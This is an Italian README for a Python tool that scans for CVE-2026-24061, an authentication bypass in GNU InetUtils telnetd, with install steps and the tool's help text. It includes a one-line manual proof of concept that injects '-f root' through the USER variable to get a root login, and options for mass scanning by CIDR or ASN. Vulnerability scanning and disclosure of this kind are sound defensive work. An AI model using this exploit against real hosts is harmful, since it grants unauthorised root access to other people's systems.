
CVE-2026-24061 - Bypass dell'autenticazione remota in Telnetd di GNU InetUtils
Uno scanner Potente, Veloce ed Elegante per rilevare servizi Telnetd vulnerabili affetti da CVE-2026-24061. Realizzato con la pura libreria standard di Python - zero dipendenze esterne richieste.
CVE-2026-24061 è una vulnerabilità critica di bypass dell'autenticazione in GNU InetUtils Telnetd che consente a attaccanti remoti non autenticati di ottenere accesso root sfruttando la gestione dell'opzione NEW-ENVIRON.
La seguente è la configurazione del servizio Telnetd sul lato host di destinazione.
Ed ecco la Prova di Concetto (PoC) per questa vulnerabilità, che può essere eseguita manualmente dall'host dell'attaccante semplicemente eseguendo il comando USER="-f root" telnet -a <TARGET_HOST> 23.
La vulnerabilità sfrutta una validazione impropria della variabile d'ambiente USER nella negoziazione dell'opzione telnet NEW-ENVIRON (RFC 1572), consentendo agli attaccanti di iniettare valori dannosi come -f root per bypassare l'autenticazione.
9.8 (Critico) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner
# Make Executable
sudo chmod +x twenty-three-scanner.py
# Run the Script
sudo python3 twenty-three-scanner.py -h
Il seguente è un manuale per lo strumento Twenty-Three Scanner che può essere utilizzato per rilevare la vulnerabilità CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass.
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
[--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
options:
-h, --help show this help message and exit
Target Options:
-t TARGET, --target TARGET
target IP, CIDR, or comma-separated list (can be used multiple times)
-f FILE, --file FILE file containing targets (one per line, supports comments with #)
-a ASN, --asn ASN autonomous system number (e.g., AS10111 or 10111)
Scan Options:
-p PORT, --port PORT target port(s), comma-separated (default: 23)
--threads N number of concurrent threads (default: 50)
--user-value VALUE USER environment variable value for exploit (default: '-f root')